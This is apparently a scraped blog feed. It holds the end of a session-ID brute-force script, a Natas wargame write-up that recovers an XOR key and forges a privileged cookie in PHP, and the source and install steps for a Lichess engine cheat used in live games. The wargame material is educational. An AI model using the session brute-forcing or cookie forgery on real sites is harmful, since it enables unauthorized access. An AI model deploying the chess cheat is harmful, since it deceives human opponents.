            <span class="k">if</span> <span class="n">DEBUG</span><span class="p">:</span>
                <span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Requesting with sid </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">session_id</span><span class="p">))</span>
            <span class="k">if</span> <span class="s1">'You are logged in as a regular user.'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">response</span><span class="p">:</span>
                <span class="nb">print</span><span class="p">(</span><span class="s1">'[!] Got something: '</span> <span class="o">+</span> <span class="n">session_id</span><span class="p">)</span>
                <span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>


<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="c1"># spawn 10 threads and spread the 640 candidate IDs across them</span>
    <span class="n">threads</span> <span class="o">=</span> <span class="p">[</span><span class="n">Bruter</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">)]</span>
    <span class="k">for</span> <span class="n">sid</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">641</span><span class="p">):</span>
        <span class="n">threads</span><span class="p">[</span><span class="n">sid</span><span class="o">%</span><span class="mi">10</span><span class="p">]</span><span class="o">.</span><span class="n">sids</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">sid</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
        <span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
        <span class="n">t</span><span class="o">.</span><span class="n">join</span><span class="p">()</span>


<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div>Solution for Natas11 for natas wargame on overthewire.org2015-09-10T15:57:00+02:002015-09-10T15:57:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-10:/2015/09/10/solution-for-natas11-for-natas-wargame-on-overthewire-org/<h3>Solution for Natas web security wargame with by XORing the plaintext with the ciphertext...</h3>
<p>Currently I am playing some wargames on
<a href="http://overthewire.org/wargames/">overthewire.org</a>.</p>
<p>The first 10 levels were very easy and everyone with some technical
knowledge and programming experience should be able to solve them. But
somehow I got stuck for a few hours on level 11. The task is to modify an
XOR-encrypted cookie. For some reason I couldn't figure out how to
obtain the XOR key that was used.</p>
<p>The challenge was to recover the key from a known plaintext
and its ciphertext. Of course I should have realized very quickly that
XORing the plaintext with the ciphertext gives us back the key. But why
is this so? Since the ciphertext is the plaintext XORed with the key, consider the following: </p>
<p><code>plaintext xor ciphertext = plaintext xor (plaintext xor key) = (plaintext xor plaintext) xor key = 00000... xor key = key</code></p>
<p>As you can see, the plaintext cancels out. If the plaintext were a
single byte, say 1100 1101, then XORing this byte with itself yields:<br>
<code>1100 1101 XOR 1100 1101 = 0000 0000</code></p>
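<p>The same cancellation can be tried out in a few lines of Python. This is a sketch with a made-up demo key, not the key from the wargame; <code>xor_bytes</code> and <code>shortest_period</code> are hypothetical helper names. Because the key repeats, XORing plaintext and ciphertext yields the key over and over, so the shortest repeating prefix is taken as the key.</p>

```python
from itertools import cycle


def xor_bytes(data, key):
    """XOR data with a key that repeats as often as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream):
    """Return the shortest prefix that, repeated, reproduces the whole stream."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


plaintext = b'{"showpassword":"no","bgcolor":"#ffffff"}'
key = b"k3y!"  # made-up demo key, not the one used by the wargame
ciphertext = xor_bytes(plaintext, key)

# plaintext xor ciphertext is the key repeated over the whole length
keystream = xor_bytes(ciphertext, plaintext)
recovered = shortest_period(keystream)
print(recovered)
```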
<p>To finally get to the solution of the wargame, you can save the following
code as a PHP file and run it:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="k">function</span> <span class="nf">xor_encrypt</span><span class="p">(</span><span class="nv">$text</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$outText</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="c1">// Iterate through each character</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o"><</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$text</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$outText</span> <span class="o">.=</span> <span class="nv">$text</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span> <span class="o">^</span> <span class="nv">$key</span><span class="p">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nv">$outText</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">decodeData</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">json_decode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$data</span><span class="p">),</span> <span class="nv">$key</span><span class="p">),</span> <span class="k">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">encodeData</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nb">json_encode</span><span class="p">(</span><span class="nv">$data</span><span class="p">),</span> <span class="nv">$key</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">encodeData2</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nx">xor_encrypt</span><span class="p">(</span><span class="nv">$data</span><span class="p">,</span> <span class="nv">$key</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">function</span> <span class="nf">xstrings</span><span class="p">(</span><span class="nv">$s1</span><span class="p">,</span> <span class="nv">$s2</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$s1</span><span class="p">)</span> <span class="o">!=</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$s2</span><span class="p">))</span> <span class="p">{</span>
<span class="k">print</span> <span class="s1">'Strings must be equal in length!'</span><span class="p">;</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="nv">$res</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="k">for</span><span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$s1</span><span class="p">);</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$res</span> <span class="o">.=</span> <span class="nv">$s1</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span> <span class="o">^</span> <span class="nv">$s2</span><span class="p">[</span><span class="nv">$i</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">echo</span> <span class="nv">$res</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="k">echo</span> <span class="nb">bin2hex</span><span class="p">(</span><span class="nv">$res</span><span class="p">)</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// finding out the key</span>
<span class="nx">xstrings</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="s2">"ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="</span><span class="p">),</span>
<span class="nb">json_encode</span><span class="p">(</span><span class="k">array</span><span class="p">(</span> <span class="s2">"showpassword"</span><span class="o">=></span><span class="s2">"no"</span><span class="p">,</span> <span class="s2">"bgcolor"</span><span class="o">=></span><span class="s2">"#ffffff"</span><span class="p">)));</span>
<span class="c1">// the above function outputs</span>
<span class="c1">// qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq</span>
<span class="c1">// 7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a7177384a71</span>
<span class="c1">// we can easily see that the xor key must be 'qw8J'</span>
<span class="nv">$key</span> <span class="o">=</span> <span class="s1">'qw8J'</span><span class="p">;</span>
<span class="c1">// generate the new data with the key</span>
<span class="k">echo</span> <span class="s1">'Submit the following as the "data" cookie to gain access: '</span><span class="o">.</span><span class="nx">encodeData</span><span class="p">(</span><span class="k">array</span><span class="p">(</span><span class="s2">"showpassword"</span><span class="o">=></span><span class="s2">"yes"</span><span class="p">,</span> <span class="s2">"bgcolor"</span><span class="o">=></span><span class="s2">"#ffffff"</span><span class="p">),</span> <span class="nv">$key</span><span class="p">)</span><span class="o">.</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>Here is a screenshot of the message you get when submitting the generated
cookie:</p>
<p><img alt="Screenshot - 10.09.2015 -16:32:49" src="https://incolumitas.com/uploads/2015/09/Screenshot-10.09.2015-163249-1024x484.png"></p>Cross platform Lichess Cheat2015-08-12T23:24:00+02:002015-01-10T14:01:00+01:00Nikolai Tschachertag:incolumitas.com,2015-08-12:/2015/08/12/cross-platform-lichess-cheat/<h2>Edit: Cheat updated on 1.10.2015</h2>
<p><strong>Visit <a href="https://incolumitas.com/pages/lichess-bot/">Lichess Bot Projects Page</a> for the newest information for this bot!</strong>
The description and code below will probably not work anymore!</p>
<hr>
<p>Hello Everyone</p>
<p>Once in a while I like to <a href="http://lichess.org">play chess on lichess</a>.
But sometimes I get beaten so badly that I want to take some
revenge :D. Recently I created a new cheat for lichess. You can find the
whole source code in my <a href="https://github.com/NikolaiT/lichess_cheat">lichess cheat GitHub
repository</a>. If you want to
use the cheat, please follow these steps:</p>
<ol>
<li>Download and install Python 3.4 (or newer) for your operating system
from here: <a href="https://www.python.org/downloads/">python web site</a></li>
<li>Add Python to your system path so that you can run Python files
from anywhere (this step depends on which operating system you are
using)</li>
<li>Then download the python cheat from
<a href="https://github.com/NikolaiT/lichess_cheat">here</a>. It is the file
with the <strong>.py</strong> suffix</li>
<li>Then execute the Python cheat file. Just go
to the directory where you saved it and enter in a shell: <code>python
cheat_server.py</code></li>
<li>Open your browser (tested with Chrome and Firefox) and, in the network
settings, add the HTTP proxy server that is printed in the
shell when you run <code>python cheat_server.py</code></li>
<li>Then login to lichess and start a new game in which you want to
cheat. The cheat should now show you the best moves with a red
border around the chess squares</li>
</ol>
<p>For a <strong>video tutorial</strong> watch the following video: <em>will follow soon</em></p>
<p>For all who are interested in how the cheat works: you need to know
Python and JavaScript. The Python code downloads the Stockfish engine,
starts it as an interactive process and communicates with the Stockfish binary
over UCI. The engine is then exposed via a simple web server that the
JavaScript cheat makes use of.</p>
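<p>To make the data flow a bit more concrete, here is a rough sketch of the translation step between the web server and the engine. It is not the code from the repository: the function names are invented, the URL layout is taken from the comment in the JavaScript in this post, and the UCI strings are the standard <code>position</code>, <code>go</code> and <code>bestmove</code> lines. Starting and talking to the Stockfish process is left out.</p>

```python
import re
from urllib.parse import unquote

# Assumed URL layout: /allMoves/e2e4 e7e5/incrementTime/1/remainingTime/60/
PATH_RE = re.compile(r"/allMoves/(.*?)/incrementTime/(\d+)/remainingTime/(\d+)/?")


def parse_request_path(path):
    """Extract the move list and clock values (in seconds) from the URL path."""
    match = PATH_RE.fullmatch(unquote(path))
    if match is None:
        raise ValueError("unexpected path: " + path)
    moves, increment, remaining = match.groups()
    return {"moves": moves.split(),
            "increment_s": int(increment),
            "remaining_s": int(remaining)}


def uci_commands(moves, remaining_s, increment_s, side="white"):
    """Build the UCI lines to send to the engine (UCI clocks are in ms)."""
    position = "position startpos"
    if moves:
        position += " moves " + " ".join(moves)
    prefix = "w" if side == "white" else "b"
    go = "go {0}time {1} {0}inc {2}".format(
        prefix, remaining_s * 1000, increment_s * 1000)
    return [position, go]


def parse_bestmove(line):
    """Turn 'bestmove e2e4 ponder e7e5' into the best/ponder pair."""
    tokens = line.split()
    if len(tokens) < 2 or tokens[0] != "bestmove":
        raise ValueError("not a bestmove line: " + line)
    ponder = tokens[3] if len(tokens) >= 4 and tokens[2] == "ponder" else None
    return {"best": tokens[1], "ponder": ponder}
```

<p>The <code>best</code> and <code>ponder</code> keys mirror the fields that the JavaScript reads from the server's answer.</p>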
<p>Previous versions of the cheat didn't intercept the network traffic between the lichess
server and the browser. Newer versions make use of <a href="https://github.com/abhinavsingh/proxy.py">the proxy.py
module</a>. Using a proxy has
many advantages, such as being able to modify any JavaScript logic.</p>
<p>Have a nice one.</p>
<p>Cheers</p>
<h2>The code</h2>
<h3>Javascript cheat to paste in the Browser Console after Python Cheat was run</h3>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> *</span>
<span class="cm"> * https://github.com/NikolaiT/lichess_cheat</span>
<span class="cm"> *</span>
<span class="cm"> * Just copy paste this file into your browsers javascript console.</span>
<span class="cm"> * Make sure the cheat_server.py is running on your localhost before!</span>
<span class="cm"> *</span>
<span class="cm"> * Author = Nikolai Tschacher</span>
<span class="cm"> * Date = Summer 2015</span>
<span class="cm"> * Contact = incolumitas.com</span>
<span class="cm"> */</span>
<span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">allMoves</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">incrementTime</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="sr">/\+([0-9]+)/g</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'span.setup'</span><span class="p">).</span><span class="nx">text</span><span class="p">())[</span><span class="mf">1</span><span class="p">]);</span>
<span class="kd">var</span> <span class="nx">ply</span> <span class="o">=</span> <span class="o">-</span><span class="mf">1</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">uci</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">playerColor</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-board'</span><span class="p">).</span><span class="nx">hasClass</span><span class="p">(</span><span class="s1">'orientation-black'</span><span class="p">)</span> <span class="o">?</span> <span class="s1">'black'</span> <span class="o">:</span> <span class="s1">'white'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">debug</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">addEngineProposalClass</span><span class="p">()</span> <span class="p">{</span>
<span class="c1">// create a style element that holds the highlight rules</span>
<span class="nx">$</span><span class="p">(</span><span class="s2">"&lt;style&gt;&lt;/style&gt;"</span><span class="p">)</span>
<span class="p">.</span><span class="nx">prop</span><span class="p">(</span><span class="s2">"type"</span><span class="p">,</span> <span class="s2">"text/css"</span><span class="p">)</span>
<span class="p">.</span><span class="nx">html</span><span class="p">(</span><span class="s2">"\</span>
<span class="s2"> .engineProposal {\</span>
<span class="s2"> border-color: #FF4D4D;\</span>
<span class="s2"> border-width: 3px;\</span>
<span class="s2"> border-style: solid;\</span>
<span class="s2"> }\</span>
<span class="s2"> .enginePonderProposal {\</span>
<span class="s2"> border-color: #5CADFF;\</span>
<span class="s2"> border-width: 2px;\</span>
<span class="s2"> border-style: solid;\</span>
<span class="s2"> }"</span><span class="p">)</span>
<span class="p">.</span><span class="nx">appendTo</span><span class="p">(</span><span class="s2">"head"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">highlightEngineProposal</span><span class="p">(</span><span class="nx">engineMove</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">bfrom</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">best</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">2</span><span class="p">),</span>
<span class="nx">bto</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">best</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">4</span><span class="p">),</span>
<span class="nx">pfrom</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">ponder</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">2</span><span class="p">),</span>
<span class="nx">pto</span> <span class="o">=</span> <span class="nx">engineMove</span><span class="p">.</span><span class="nx">ponder</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">4</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square'</span><span class="p">).</span><span class="nx">removeClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square'</span><span class="p">).</span><span class="nx">removeClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">bfrom</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">bto</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'engineProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">pfrom</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.'</span> <span class="o">+</span> <span class="nx">pto</span><span class="p">).</span><span class="nx">addClass</span><span class="p">(</span><span class="s1">'enginePonderProposal'</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getLastMove</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">function</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">s</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/[a-h][1-8]/g</span><span class="p">);</span> <span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">to</span> <span class="o">=</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.last-move.occupied'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'class'</span><span class="p">));</span>
<span class="kd">var</span> <span class="kr">from</span> <span class="o">=</span> <span class="nx">getMove</span><span class="p">(</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.cg-square.last-move'</span><span class="p">).</span><span class="nx">not</span><span class="p">(</span><span class="s1">'.occupied'</span><span class="p">).</span><span class="nx">attr</span><span class="p">(</span><span class="s1">'class'</span><span class="p">));</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="kr">from</span><span class="o">+</span><span class="nx">to</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getRemainingTime</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">time</span> <span class="o">=</span> <span class="nx">$</span><span class="p">(</span><span class="s1">'.clock_'</span> <span class="o">+</span> <span class="nx">playerColor</span> <span class="o">+</span> <span class="s1">' .time'</span><span class="p">).</span><span class="nx">text</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">minutes</span> <span class="o">=</span> <span class="nb">parseInt</span><span class="p">(</span><span class="sr">/^([0-9]*?):/g</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">time</span><span class="p">)[</span><span class="mf">1</span><span class="p">],</span> <span class="mf">10</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">minutes</span> <span class="o">*</span> <span class="mf">60</span> <span class="o">+</span> <span class="nb">parseInt</span><span class="p">(</span><span class="nx">time</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="o">-</span><span class="mf">2</span><span class="p">),</span> <span class="mf">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getEngineMoveByAllMoves</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">bestMoves</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="nx">$</span><span class="p">.</span><span class="nx">ajax</span><span class="p">({</span>
<span class="c1">// /allMoves/e2e4 e7e5/incrementTime/1/remainingTime/60/</span>
<span class="nx">url</span><span class="o">:</span> <span class="s2">"http://localhost:8888/allMoves/"</span> <span class="o">+</span> <span class="nx">allMoves</span> <span class="o">+</span> <span class="s2">"/incrementTime/"</span> <span class="o">+</span> <span class="nx">incrementTime</span> <span class="o">+</span> <span class="s2">"/remainingTime/"</span> <span class="o">+</span> <span class="nx">getRemainingTime</span><span class="p">()</span> <span class="o">+</span> <span class="s2">"/"</span><span class="p">,</span>
<span class="nx">success</span><span class="o">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">html</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">bestMoves</span> <span class="o">=</span> <span class="nx">html</span><span class="p">;</span>
<span class="p">},</span>
<span class="k">async</span><span class="o">:</span><span class="kc">false</span>
<span class="p">});</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s1">'best'</span><span class="o">:</span> <span class="nx">bestMoves</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">4</span><span class="p">),</span>
<span class="s1">'ponder'</span><span class="o">:</span> <span class="nx">bestMoves</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mf">5</span><span class="p">,</span><span class="mf">9</span><span class="p">)</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">isMyTurn</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'white'</span> <span class="o">&&</span> <span class="p">(</span><span class="nx">ply</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">===</span> <span class="mf">0</span><span class="p">))</span> <span class="o">||</span>
<span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'black'</span> <span class="o">&&</span> <span class="p">(</span><span class="nx">ply</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">===</span> <span class="mf">1</span><span class="p">));</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">showEngineMove</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">isMyTurn</span><span class="p">())</span> <span class="p">{</span>
<span class="nx">engineMoves</span> <span class="o">=</span> <span class="nx">getEngineMoveByAllMoves</span><span class="p">();</span>
<span class="nx">highlightEngineProposal</span><span class="p">(</span><span class="nx">engineMoves</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">addEngineProposalClass</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">playerColor</span> <span class="o">===</span> <span class="s1">'black'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">uci</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>
<span class="nx">ply</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">lastMove</span> <span class="o">=</span> <span class="nx">getLastMove</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">uci</span> <span class="o">!==</span> <span class="nx">lastMove</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// new next move!</span>
<span class="nx">uci</span> <span class="o">=</span> <span class="nx">lastMove</span><span class="p">;</span>
<span class="nx">ply</span><span class="o">++</span><span class="p">;</span>
<span class="nx">allMoves</span> <span class="o">+=</span> <span class="p">(</span><span class="s1">' '</span> <span class="o">+</span> <span class="nx">uci</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">debug</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">playerColor</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"My turn: "</span> <span class="o">+</span> <span class="nx">isMyTurn</span><span class="p">());</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">allMoves</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">ply</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">uci</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">showEngineMove</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">},</span> <span class="mf">75</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
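<p>The userscript above encodes the game state in the URL path and reads the reply as two moves separated by a space. As a rough illustration only, the following sketch shows how such a path and reply could be taken apart. The names <code>parse_engine_path</code> and <code>split_reply</code> are hypothetical and not part of the original script, and the sketch assumes plain four-character moves such as <code>e2e4</code>.</p>

```python
import re
from urllib.parse import unquote

# Hypothetical helpers for illustration; they are not taken from the
# original server script.
PATH_RE = re.compile(
    r'^/allMoves/([^/]*)/incrementTime/(\d+)/remainingTime/(\d+)/?$'
)


def parse_engine_path(path):
    """Return (moves, increment_seconds, remaining_seconds) or None.

    The path is URL-decoded first because a browser sends the space
    between moves as %20.
    """
    match = PATH_RE.match(unquote(path))
    if match is None:
        return None
    moves = match.group(1).split()
    return moves, int(match.group(2)), int(match.group(3))


def split_reply(reply):
    """Split a reply such as 'e2e4 e7e5' into best and ponder move.

    Mirrors the slice(0, 4) and slice(5, 9) calls in the userscript.
    """
    return {'best': reply[0:4], 'ponder': reply[5:9]}
```

<p>Calling <code>parse_engine_path</code> on the example path from the userscript comment yields the move list together with both times in seconds. A path that does not follow the expected layout yields <code>None</code>.</p>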
<h3>This Python file downloads and runs Stockfish and must be run first</h3>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="c1"># https://github.com/NikolaiT/lichess_cheat</span>
<span class="c1"># Implements a RESTful Api to the stockfish engine.</span>
<span class="c1"># You may call this RESTful API with a request like the following:</span>
<span class="c1"># http://localhost:8888/allMoves/e2e4 e7e5/incrementTime/1/remainingTime/60/</span>
<span class="c1"># All times are in seconds.</span>
<span class="n">__author__</span> <span class="o">=</span> <span class="s1">'Nikolai Tschacher'</span>
<span class="n">__contact__</span> <span class="o">=</span> <span class="s1">'incolumitas.com'</span>
<span class="n">__date__</span> <span class="o">=</span> <span class="s1">'Summer 2015'</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">urllib.request</span>
<span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">unquote</span>
<span class="kn">from</span> <span class="nn">http.server</span> <span class="kn">import</span> <span class="n">BaseHTTPRequestHandler</span><span class="p">,</span> <span class="n">HTTPServer</span>
<span class="kn">import</span> <span class="nn">socketserver</span>
<span class="kn">import</span> <span class="nn">zipfile</span>
<span class="kn">import</span> <span class="nn">pprint</span>
<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'stockfish_download_link'</span><span class="p">:</span> <span class="s1">'https://stockfish.s3.amazonaws.com/stockfish-6-</span><span class="si">{}</span><span class="s1">.zip'</span><span class="p">,</span>
<span class="s1">'stockfish_binary'</span> <span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># the path to your local stockfish binary</span>
<span class="s1">'pwd'</span><span class="p">:</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">dirname</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">realpath</span><span class="p">(</span><span class="vm">__file__</span><span class="p">)),</span>
<span class="s1">'debug'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span>
<span class="s1">'thinking_time'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>
